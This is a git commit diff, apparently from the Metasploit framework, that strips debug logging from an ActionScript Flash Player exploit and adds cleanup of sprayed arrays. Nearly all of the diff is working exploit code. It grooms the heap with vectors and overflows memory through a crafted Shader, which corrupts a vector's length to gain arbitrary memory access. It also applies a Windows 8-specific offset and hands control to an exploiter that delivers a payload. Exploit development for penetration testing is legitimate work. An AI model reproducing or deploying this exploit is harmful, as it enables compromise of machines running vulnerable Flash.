Delete debug
jvazquez-r7
parent
8ed13b1d1b
commit
72672fc8f7
Binary file not shown.
|
|
@ -1,4 +1,6 @@
|
|||
//compile with AIR SDK 13.0: mxmlc Exploit.as -o Exploit.swf
|
||||
//compile with AIR SDK 13.0: mxmlc Exploit.as -o msf.swf
|
||||
// It uses original code from @hdarwin89 for exploitation using ba's and vectors
|
||||
|
||||
package {
|
||||
import flash.display.Sprite
|
||||
import flash.utils.ByteArray
|
||||
|
|
@ -43,7 +45,6 @@ package {
|
|||
var corrupted_vector_idx:int = -1
|
||||
|
||||
// Memory massage
|
||||
Logger.log("Memory massage")
|
||||
var array_length:uint = 0x10000
|
||||
var vector_size:uint = 34
|
||||
var array:Array = new Array()
|
||||
|
|
@ -67,24 +68,15 @@ package {
|
|||
{
|
||||
array[(i - (2 * (j % 2)))].length = 0x0100
|
||||
array[(i - (2 * (j % 2)))][0] = 0xdeedbeef
|
||||
array[(i - (2 * (j % 2)))][1] = 0xdeadbeef
|
||||
array[(i - (2 * (j % 2)))][2] = (i - (2 * (j % 2)))
|
||||
i = (i + 28)
|
||||
j++
|
||||
}
|
||||
|
||||
// Overflow and Search for corrupted vector
|
||||
Logger.log("Overflow and Search for corrupted vector")
|
||||
var shadba:ByteArray = (new this.Shad() as ByteArray)
|
||||
shadba.position = 232
|
||||
if (Capabilities.os.indexOf("Windows 8") >= 0)
|
||||
{
|
||||
shadba.writeUnsignedInt(2472)
|
||||
}
|
||||
shadba.position = 0
|
||||
|
||||
Logger.log("corrupting")
|
||||
|
||||
shader = new Shader()
|
||||
try
|
||||
{
|
||||
|
|
@ -103,13 +95,11 @@ package {
|
|||
}
|
||||
|
||||
if (corrupted_vector_idx == -1) {
|
||||
Logger.log("Exploit - Corrupted vector not found.")
|
||||
return
|
||||
}
|
||||
|
||||
for(i = 0; i < array[corrupted_vector_idx].length; i++) {
|
||||
if (array[corrupted_vector_idx][i] == 0x0100 && array[corrupted_vector_idx][i + 2] == 0xdeedbeef) {
|
||||
Logger.log("w00t!, found, corrupting ")
|
||||
array[corrupted_vector_idx][i] = 0xffffffff
|
||||
offset = i
|
||||
break
|
||||
|
|
@ -117,24 +107,25 @@ package {
|
|||
}
|
||||
|
||||
if (offset == -1) {
|
||||
Logger.log("Exploit - Secondary vector not corrupted")
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
for(i = 0; i < array.length; i++) {
|
||||
if (array[i].length == 0xffffffff) {
|
||||
Logger.log("super corrupted found")
|
||||
uv = array[i]
|
||||
Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
|
||||
uv[0x3ffffffc - offset] = 34
|
||||
Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
|
||||
}
|
||||
}
|
||||
Logger.log('done? Exploiting!')
|
||||
|
||||
for(i = 0; i < array.length; i++) {
|
||||
if (array[i].length != 0xffffffff) {
|
||||
delete(array[i])
|
||||
array[i] = null
|
||||
}
|
||||
}
|
||||
|
||||
exploiter = new Exploiter(this, platform, os, payload, uv)
|
||||
// uv[0x3ffffffe] = 0x100
|
||||
// Logger.log(uv.length.toString())
|
||||
}
|
||||
}
|
||||
}//package
|
||||
}
|
||||
|
|
|
|||
|
|
@ -3,7 +3,7 @@ package
|
|||
import flash.external.ExternalInterface
|
||||
|
||||
public class Logger {
|
||||
private static const DEBUG:uint = 1
|
||||
private static const DEBUG:uint = 0
|
||||
|
||||
public static function alert(msg:String):void
|
||||
{
|
||||
|
|
|
|||
Loading…
Reference in New Issue